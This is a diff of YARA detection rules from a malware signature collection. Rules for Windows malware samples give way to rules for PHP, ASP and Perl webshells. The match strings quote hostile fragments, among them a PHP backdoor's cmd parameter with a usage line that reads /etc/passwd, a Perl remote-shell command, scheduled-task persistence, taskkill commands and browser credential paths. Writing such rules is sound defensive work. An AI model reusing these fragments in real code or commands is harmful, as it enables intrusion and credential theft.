+		logic_hash = "f312298ac30ab57b21222a529b1566b9a66909806e4bc88120ac3992cfd3c6fb"
+		score = 75
 		quality = 85
-		tags = "FILE"
-		hash1 = "686b5240e5e503528cc5ac8d764883413a260716dd290f114a60af873ee6a65f"
-		hash2 = "93951379e57e4f159bb62fd7dd563d1ac2f3f23c80ba89f2da2e395b8a647dcf"
-		hash3 = "a9ca1d6a981ccc8d8b144f337c259891a67eb6b85ee41b03699baacf4aae9a78"
+		tags = ""
 
 	strings:
-		$a1 = "NullsoftInst" ascii
-		$b1 = "Microsoft Corporation" wide fullword
-		$b2 = "Apache Software Foundation" ascii wide fullword
-		$b3 = "Simon Tatham" wide fullword
-		$fp1 = "nsisinstall" fullword ascii
-		$fp2 = "\\REGISTRY\\MACHINE\\Software\\" wide
-		$fp3 = "Apache Tomcat" wide fullword
-		$fp4 = "Bot Framework Emulator" wide fullword
-		$fp5 = "Firefox Helper" wide fullword
-		$fp6 = "Paint.NET Setup" wide fullword
-		$fp7 = "Microsoft .NET Services Installation Utility" wide fullword
-		$fp8 = "License: MPL 2" wide
+		$s2 = "PySystemState.initialize(System.getProperties(), null, argv);" fullword
+		$s3 = "public class JythonShell extends JPanel implements Runnable {" fullword
+		$s4 = "public static int DEFAULT_SCROLLBACK = 100"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2000KB and $a1 and 1 of ( $b* ) and not 1 of ( $fp* )
+		2 of them
 }
-rule SIGNATURE_BASE_CN_Disclosed_20180208_Lsls : FILE
+rule SIGNATURE_BASE_STNC_Php_Php
 {
 	meta:
-		description = "Detects malware from disclosed CN malware set"
-		author = "Florian Roth (Nextron Systems)"
-		id = "c6c4aa72-1a84-552f-bea0-38b332a74233"
-		date = "2018-02-08"
-		modified = "2023-12-05"
-		reference = "https://twitter.com/cyberintproject/status/961714165550342146"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_cn_campaign_njrat.yar#L13-L26"
+		description = "Semi-Auto-generated  - file STNC.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "8a7167f6-fa62-574f-a37c-3ceadc7f92ec"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4094-L4107"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c6542391e8d1a4fe4d26fd8b2dfb1fcab7b39c67dcc6495f2e5f95c4d6f8d61c"
+		hash = "2e56cfd5b5014cbbf1c1e3f082531815"
+		logic_hash = "b4118dc45ac109bde1cafda24cc103370db57c1993690f450cff828c1633af3c"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "94c6a92984df9ed255f4c644261b01c4e255acbe32ddfd0debe38b558f29a6c9"
+		tags = ""
 
 	strings:
-		$x1 = "User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)" fullword ascii
+		$s0 = "drmist.ru" fullword
+		$s1 = "hidden(\"action\",\"download\").hidden_pwd().\"<center><table><tr><td width=80"
+		$s2 = "STNC WebShell"
+		$s3 = "http://www.security-teams.net/index.php?showtopic="
 
 	condition:
-		uint16( 0 ) == 0x457f and filesize < 3000KB and $x1
+		1 of them
 }
-rule SIGNATURE_BASE_CN_Disclosed_20180208_C : FILE
+rule SIGNATURE_BASE_Azrailphp_V1_0_Php
 {
 	meta:
-		description = "Detects malware from disclosed CN malware set"
-		author = "Florian Roth (Nextron Systems)"
-		id = "cb0bcdc4-7eca-59b7-a947-85c232d4e599"
-		date = "2018-02-08"
-		modified = "2023-12-05"
-		reference = "https://twitter.com/cyberintproject/status/961714165550342146"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_cn_campaign_njrat.yar#L28-L55"
+		description = "Semi-Auto-generated  - file aZRaiLPhp v1.0.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "60152b96-e8d3-5b06-a855-fb64a490742b"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4108-L4120"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "cfdc7ce8b89a16d2ae604268a030bd41259fed87a7f37b0dca8f7c467703c7f2"
+		hash = "26b2d3943395682e36da06ed493a3715"
+		logic_hash = "4385f294e59b644fe86d8380db4f7926924eb744ad80735b78ef778d2f7e8ae0"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7"
+		tags = ""
 
 	strings:
-		$x1 = "cmd.exe /c ping 0 -n 2 & del \"" fullword wide
-		$x2 = "schtasks /create /sc minute /mo 1 /tn Server /tr " fullword wide
-		$x3 = "www.upload.ee/image/" wide
-		$s1 = "winmgmts:\\\\.\\root\\SecurityCenter2" fullword wide
-		$s2 = "/Server.exe" fullword wide
-		$s3 = "Executed As " fullword wide
-		$s4 = "WmiPrvSE.exe" fullword wide
-		$s5 = "Stub.exe" fullword ascii
-		$s6 = "Download ERROR" fullword wide
-		$s7 = "shutdown -r -t 00" fullword wide
-		$s8 = "Select * From AntiVirusProduct" fullword wide
+		$s0 = "azrailphp"
+		$s1 = "<br><center><INPUT TYPE='SUBMIT' NAME='dy' VALUE='Dosya Yolla!'></center>"
+		$s3 = "<center><INPUT TYPE='submit' name='okmf' value='TAMAM'></center>"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and ( 1 of ( $x* ) or 4 of them )
+		2 of them
 }
-rule SIGNATURE_BASE_CN_Disclosed_20180208_System3 : FILE
+rule SIGNATURE_BASE_Moroccan_Spamers_Ma_Edition_By_Ghost_Php
 {
 	meta:
-		description = "Detects malware from disclosed CN malware set"
-		author = "Florian Roth (Nextron Systems)"
-		id = "097f4506-295d-5066-8895-2148436731c1"
-		date = "2018-02-08"
-		modified = "2023-12-05"
-		reference = "https://twitter.com/cyberintproject/status/961714165550342146"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_cn_campaign_njrat.yar#L57-L74"
+		description = "Semi-Auto-generated  - file Moroccan Spamers Ma-EditioN By GhOsT.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "721d6e9f-a237-5462-a8d3-f838d7fda420"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4121-L4133"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "8292ae1de39c57bc5ed6fa078570e92dbcd22cd13d5b5f22d158986708139fbe"
+		hash = "d1b7b311a7ffffebf51437d7cd97dc65"
+		logic_hash = "e755e4ea467861e5217d532b161bf4c582ff71aa1e4720dfa4b75d6e8d7629d8"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "73fa84cff51d384c2d22d9e53fc5d42cb642172447b07e796c81dd403fb010c2"
+		tags = ""
 
 	strings:
-		$a1 = "WmiPrvSE.exe" fullword wide
-		$s1 = "C:\\Users\\sgl\\AppData\\Local\\" ascii
-		$s2 = "Temporary Projects\\WmiPrvSE\\" ascii
-		$s3 = "$15a32a5d-4906-458a-8f57-402311afc1c1" fullword ascii
+		$s0 = ";$sd98=\"john.barker446@gmail.com\""
+		$s1 = "print \"Sending mail to $to....... \";"
+		$s2 = "<td colspan=\"2\" width=\"715\" background=\"/simparts/images/cellpic1.gif\" hei"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and $a1 and 1 of ( $s* )
+		1 of them
 }
-
-rule SIGNATURE_BASE_CN_Disclosed_20180208_Mal1 : FILE
+rule SIGNATURE_BASE_Zacosmall_Php
 {
 	meta:
-		description = "Detects malware from disclosed CN malware set"
-		author = "Florian Roth (Nextron Systems)"
-		id = "8516bbfb-a2ad-565d-bf6c-71629b1831a1"
-		date = "2018-02-08"
-		modified = "2023-12-05"
-		reference = "https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_cn_campaign_njrat.yar#L77-L103"
+		description = "Semi-Auto-generated  - file zacosmall.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "25946aa7-7c56-5670-ae2f-c55e65a3b911"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4134-L4146"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "cf532761d07ee3e84028a9071409f081a7a85728d55c215c912f0b70902f101f"
+		hash = "5295ee8dc2f5fd416be442548d68f7a6"
+		logic_hash = "5a2125fc447344f8cc708503d9e4dd82f9b873e40ded497ef9e01974d08bf043"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "173d69164a6df5bced94ab7016435c128ccf7156145f5d26ca59652ef5dcd24e"
+		tags = ""
 
 	strings:
-		$x1 = "%SystemRoot%\\system32\\termsrvhack.dll" fullword ascii
-		$x2 = "User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" fullword ascii
-		$a1 = "taskkill /f /im cmd.exe" fullword ascii
-		$a2 = "taskkill /f /im mstsc.exe" fullword ascii
-		$a3 = "taskkill /f /im taskmgr.exe" fullword ascii
-		$a4 = "taskkill /f /im regedit.exe" fullword ascii
-		$a5 = "taskkill /f /im mmc.exe" fullword ascii
-		$s1 = "K7TSecurity.exe" fullword ascii
-		$s2 = "ServUDaemon.exe" fullword ascii
+		$s0 = "rand(1,99999);$sj98"
+		$s1 = "$dump_file.='`'.$rows2[0].'`"
+		$s3 = "filename=\\\"dump_{$db_dump}_${table_d"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2000KB and ( pe.imphash ( ) == "28e3a58132364197d7cb29ee104004bf" or 1 of ( $x* ) or 3 of them )
+		2 of them
 }
-rule SIGNATURE_BASE_CN_Disclosed_20180208_Keylogger_1 : FILE
+rule SIGNATURE_BASE_Cmdasp_Asp
 {
 	meta:
-		description = "Detects malware from disclosed CN malware set"
-		author = "Florian Roth (Nextron Systems)"
-		id = "12eff9b6-1a65-5efc-b39c-88297bdae9c3"
-		date = "2018-02-08"
-		modified = "2023-12-05"
-		reference = "https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_cn_campaign_njrat.yar#L105-L122"
+		description = "Semi-Auto-generated  - file CmdAsp.asp.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "79e0ba85-ed4b-5909-a2fd-9b4125598078"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4147-L4160"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "efba7004614c690e469082255cf7b5cb62cac5da2bfcc26e036e2eafcb5728f9"
+		hash = "64f24f09ec6efaa904e2492dffc518b9"
+		logic_hash = "95dc25ecd47b43edbd7e7e36966377aa09da769aff2bc1c33a7df87989611bfa"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf"
+		tags = ""
 
 	strings:
-		$x2 = "Process already elevated." fullword wide
-		$x3 = "GetKeyloggErLogsResponse" fullword ascii
-		$x4 = "get_encryptedPassword" fullword ascii
-		$x5 = "DoDownloadAndExecute" fullword ascii
-		$x6 = "GetKeyloggeRLogs" fullword ascii
+		$s0 = "CmdAsp.asp"
+		$s1 = "Set oFileSys = Server.CreateObject(\"Scripting.FileSystemObject\")" fullword
+		$s2 = "-- Use a poor man's pipe ... a temp file --"
+		$s3 = "maceo @ dogmile.com"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and 2 of them
+		2 of them
 }
-
-rule SIGNATURE_BASE_CN_Disclosed_20180208_Mal4 : FILE
+rule SIGNATURE_BASE_Simple_Backdoor_Php
 {
 	meta:
-		description = "Detects malware from disclosed CN malware set"
-		author = "Florian Roth (Nextron Systems)"
-		id = "6165caf5-157f-5381-a77e-6ed775187ab1"
-		date = "2018-02-08"
-		modified = "2023-12-05"
-		reference = "https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_cn_campaign_njrat.yar#L124-L138"
+		description = "Semi-Auto-generated  - file simple-backdoor.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "5607f501-a750-59be-9595-5ac71ea6f74b"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4161-L4173"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "044901271adb06036e7d5aa8f2b6f893be10445bee95453c293d0025994e8d21"
+		hash = "f091d1b9274c881f8e41b2f96e6b9936"
+		logic_hash = "e2e98580b59727313de298fab0009704f621b1b6556220d5065118d960f7a068"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "f7549c74f09be7e4dbfb64006e535b9f6d17352e236edc2cdb102ec3035cf66e"
+		tags = ""
 
 	strings:
-		$s1 = "Microsoft .Net Framework COM+ Support" fullword ascii
-		$s2 = "Microsoft .NET and Windows XP COM+ Integration with SOAP" fullword ascii
+		$s0 = "$cmd = ($_REQUEST['cmd']);" fullword
+		$s1 = "<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->"
+		$s2 = "Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd" fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 3000KB and 1 of them and pe.exports ( "SPACE" )
+		2 of them
 }
-rule SIGNATURE_BASE_CN_Disclosed_20180208_Mal5 : FILE
+rule SIGNATURE_BASE_Mysql_Shell_Php
 {
 	meta:
-		description = "Detects malware from disclosed CN malware set"
-		author = "Florian Roth (Nextron Systems)"
-		id = "b1933610-9e6d-5eed-ba30-ccdd0d3a6124"
-		date = "2018-02-08"
-		modified = "2023-12-05"
-		reference = "https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_cn_campaign_njrat.yar#L140-L160"
+		description = "Semi-Auto-generated  - file mysql_shell.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "e517984b-575c-5ead-a438-9767d2c74099"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4174-L4186"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "971276d5033477a08a1ec037cff9735667c2b4f7d9d4a7bcd88f2b1d8c348d4f"
+		hash = "d42aec2891214cace99b3eb9f3e21a63"
+		logic_hash = "dbd825e1056c41efaf80c0495ba7b6cf1c88403b997ea7ac1378512a19f7ed8a"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "24c05cd8a1175fbd9aca315ec67fb621448d96bd186e8d5e98cb4f3a19482af4"
-		hash2 = "05696db46144dab3355dcefe0408f906a6d43fced04cb68334df31c6dfd12720"
+		tags = ""
 
 	strings:
-		$s1 = "4System.Web.Services.Protocols.SoapHttpClientProtocol" fullword ascii
-		$s2 = "Server.exe" fullword ascii
-		$s3 = "System.Windows.Forms.Form" fullword ascii
-		$s4 = "Stub.Resources.resources" fullword ascii
-		$s5 = "My.Computer" fullword ascii
-		$s6 = "MyTemplate" fullword ascii
-		$s7 = "Stub.My.Resources" fullword ascii
+		$s0 = "SooMin Kim"
+		$s1 = "smkim@popeye.snu.ac.kr"
+		$s2 = "echo \"<td><a href='$PHP_SELF?action=deleteData&dbname=$dbname&tablename=$tablen"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them
+		1 of them
 }
-rule SIGNATURE_BASE_SUSP_RAR_Ntdsdit : FILE
+rule SIGNATURE_BASE_Dive_Shell_1_0___Emperor_Hacking_Team_Php
 {
 	meta:
-		description = "Detects suspicious RAR file that contains ntds.dit or SAM export"
-		author = "Florian Roth (Nextron Systems)"
-		id = "da9e160f-3213-5027-bb0f-bf80ab3d5318"
-		date = "2019-12-16"
-		modified = "2022-11-15"
-		reference = "https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_rar_exfil.yar#L2-L18"
+		description = "Semi-Auto-generated  - file Dive Shell 1.0 - Emperor Hacking Team.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "d75294a4-a0a7-5c74-bb7a-766db477633c"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4187-L4200"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "12e527b040e02f573f2a6e0fac4ff99ec441bf189c9bb7e1f763619c079a5bfa"
-		score = 70
+		hash = "1b5102bdc41a7bc439eea8f0010310a5"
+		logic_hash = "bd51b625359799178ad3c8e02ba5bb5fca89e6e14769b86dd35c2b8a1049599f"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 
 	strings:
-		$x1 = "ntds.dit0" ascii fullword
-		$x2 = { 0? 53 41 4D 30 01 00 03 }
-		$x3 = { 0? 73 61 6D 30 01 00 03 }
+		$s0 = "Emperor Hacking TEAM"
+		$s1 = "Simshell" fullword
+		$s2 = "ereg('^[[:blank:]]*cd[[:blank:]]"
+		$s3 = "<form name=\"shell\" action=\"<?php echo $_SERVER['PHP_SELF'] ?>\" method=\"POST"
 
 	condition:
-		uint32( 0 ) == 0x21726152 and 1 of them
+		2 of them
 }
-rule SIGNATURE_BASE_Winagent_Badpatch_1 : FILE
+rule SIGNATURE_BASE_Asmodeus_V0_1_Pl
 {
 	meta:
-		description = "Detects samples mentioned in BadPatch report"
-		author = "Florian Roth (Nextron Systems)"
-		id = "732792ed-cb70-5b69-8457-f54177e4609e"
-		date = "2017-10-20"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/RvDwwA"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_bad_patch.yar#L11-L39"
+		description = "Semi-Auto-generated  - file Asmodeus v0.1.pl.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "cfd082a8-56fa-54bc-a683-c0052f78e12e"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4201-L4214"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "568086edb8884877f9dcb0cffa1e4c05164e6884bf80ce50692cedfa3e8d5750"
+		hash = "0978b672db0657103c79505df69cb4bb"
+		logic_hash = "be0130c9d2a5d29e6ef8749b0058c96c2ca1ecb9823fd14a8a2c82978cf3d104"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "285998bce9692e46652529685775aa05e3a5cb93ee4e65d021d2231256e92813"
+		tags = ""
 
 	strings:
-		$x1 = "J:\\newPatch\\downloader\\" wide
-		$x2 = "L:\\rashed\\New code\\" wide
-		$x3 = ":\\newPatch\\last version\\" wide
-		$x4 = "\\Microsoft\\Microsoft\\Microsoft1.log" wide
-		$x5 = "\\Microsoft\\Microsoft\\Microsoft.log" wide
-		$x6 = "\\Microsoft\\newPP.exe" wide
-		$x7 = " (this is probably a proxy server error)." fullword wide
-		$x8 = " :Old - update patch and check anti-virus.. " fullword wide
-		$x9 = "PatchNotExit-- download now.. " fullword wide
-		$x10 = "PatchNotExit-- Check Version" fullword wide
-		$x11 = "PatchNotExit-- Version Patch" fullword wide
-		$s1 = "downloader " fullword wide
-		$s2 = "DelDownloadFile" fullword ascii
-		$s3 = "downloadFile" fullword ascii
-		$s4 = "downloadUpdate" fullword wide
+		$s0 = "[url=http://www.governmentsecurity.org"
+		$s1 = "perl asmodeus.pl client 6666 127.0.0.1"
+		$s2 = "print \"Asmodeus Perl Remote Shell"
+		$s4 = "$internet_addr = inet_aton(\"$host\") or die \"ALOA:$!\\n\";" fullword
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 600KB and ( 1 of ( $x* ) or 4 of them ) )
+		2 of them
 }
-rule SIGNATURE_BASE_Winagent_Badpatch_2 : FILE
+rule SIGNATURE_BASE_Backup_Php_Often_With_C99Shell
 {
 	meta:
-		description = "Detects samples mentioned in BadPatch report"
-		author = "Florian Roth (Nextron Systems)"
-		id = "648528f0-351c-527e-b516-2c8cae9fb4a3"
-		date = "2017-10-20"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/RvDwwA"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_bad_patch.yar#L41-L74"
+		description = "Semi-Auto-generated  - file backup.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "ce88027c-ae08-59f3-948d-6f3d58515468"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4215-L4227"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "649cfca8fa9d3b9f12b56fd81d4133a00eb5449e67fca2abe85fbfb778912df8"
+		hash = "aeee3bae226ad57baf4be8745c3f6094"
+		logic_hash = "e27d00ebfbac2565568b9a97552a331db91b4e9aa318febb048937f5c3a1a1ba"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "106deff16a93c4a4624fe96e3274e1432921c56d5a430834775e5b98861c00ea"
-		hash2 = "ece76fdf7e33d05a757ef5ed020140d9367c7319022a889923bbfacccb58f4d7"
-		hash3 = "cf53fc8c9ce4e5797cc5ac6f71d4cbc0f2b15f2ed43f38048a5273f40bc09876"
-		hash4 = "802a39b22dfacdc2325f8a839377c903b4a7957503106ce6f7aed67e824b82c2"
-		hash5 = "278dba3857367824fc2d693b7d96cef4f06cb7fdc52260b1c804b9c90d43646d"
-		hash6 = "2941f75da0574c21e4772f015ef38bb623dd4d0c81c263523d431b0114dd847e"
-		hash7 = "46f3afae22e83344e4311482a9987ed851b2de282e8127f64d5901ac945713c0"
-		hash8 = "27752bbb01abc6abf50e1da3a59fefcce59618016619d68690e71ad9d4a3c247"
-		hash9 = "050610cfb3d3100841685826273546c829335a5f4e2e4260461b88367ad9502c"
+		tags = ""
 
 	strings:
-		$s1 = "myAction=shell_result&serialNumber=" fullword wide
-		$s2 = "\\Appdata\\Local\\Google\\Chrome\\User Data\\Default\\Login Data.*" wide
-		$s3 = "\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles" wide
-		$s4 = "\\Appdata\\Local\\Google\\Chrome\\User Data\\Default\\Cookies.*" wide
-		$s5 = "newSHELL[" fullword wide
-		$s6 = "\\file1.txt" wide
-		$s7 = "myAction=newGIF&serialNumber=" fullword wide
-		$s8 = "\\Storege1" wide
-		$s9 = "\\Microsoft\\mac.txt" wide
-		$s10 = "spytube____:" fullword ascii
-		$s11 = "0D0700045F5C5B0312045A04041F40014B1D11004A1F19074A141100011200154B031C04" fullword wide
-		$s12 = "16161A1000012B162503151851065A1A0007" fullword wide
-		$s13 = "-- SysFile...." fullword wide
+		$s0 = "#phpMyAdmin MySQL-Dump" fullword
+		$s2 = ";db_connect();header('Content-Type: application/octetstr"
+		$s4 = "$data .= \"#Database: $database" fullword
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 700KB and 3 of them )
+		all of them
 }
-rule SIGNATURE_BASE_Rombertik_Carbongrabber : FILE
+rule SIGNATURE_BASE_Reader_Asp
 {
 	meta:
-		description = "Detects CarbonGrabber alias Rombertik - file Copy#064046.scr"
-		author = "Florian Roth (Nextron Systems)"
-		id = "b3aee336-9f3b-5fae-928d-8357408a7b69"
-		date = "2015-05-05"
-		modified = "2023-12-05"
-		reference = "http://blogs.cisco.com/security/talos/rombertik"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_rombertik_carbongrabber.yar#L10-L31"
+		description = "Semi-Auto-generated  - file Reader.asp.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "70094d24-fa3a-503c-b9b6-294a883fc52c"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4228-L4240"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ddc3ebcc460909a4afc9994cae53c9b7642f92ab6f16e2653f6b2d5002a33cda"
+		hash = "ad1a362e0a24c4475335e3e891a01731"
+		logic_hash = "ec0dc3b050d84e852e0c18bd00961f109d3506fa7f2e8656448bd5edd28d9305"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "2f9b26b90311e62662c5946a1ac600d2996d3758"
-		hash2 = "aeb94064af2a6107a14fd32f39cb502e704cd0ab"
-		hash3 = "c2005c8d1a79da5e02e6a15d00151018658c264c"
-		hash4 = "98223d4ec272d3a631498b621618d875dd32161d"
+		tags = ""
 
 	strings:
-		$x1 = "ZwGetWriteWatch" fullword ascii
-		$x2 = "OutputDebugStringA" fullword ascii
-		$x3 = "malwar" fullword ascii
-		$x4 = "sampl" fullword ascii
-		$x5 = "viru" fullword ascii
-		$x6 = "sandb" fullword ascii
+		$s1 = "Mehdi & HolyDemon"
+		$s2 = "www.infilak."
+		$s3 = "'*T@*r@#@&mms^PdbYbVuBcAAA==^#~@%><form method=post name=inf><table width=\"75%"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 5MB and all of them
+		2 of them
 }
-rule SIGNATURE_BASE_Rombertik_Carbongrabber_Panel_Installscript : FILE
+rule SIGNATURE_BASE_Phpshell17_Php
 {
 	meta:
-		description = "Detects CarbonGrabber alias Rombertik panel install script - file install.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "f6c04e27-bbab-5012-a4f9-71d49d252b83"
-		date = "2015-05-05"
-		modified = "2023-12-05"
-		reference = "http://blogs.cisco.com/security/talos/rombertik"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_rombertik_carbongrabber.yar#L33-L53"
+		description = "Semi-Auto-generated  - file phpshell17.php.txt"
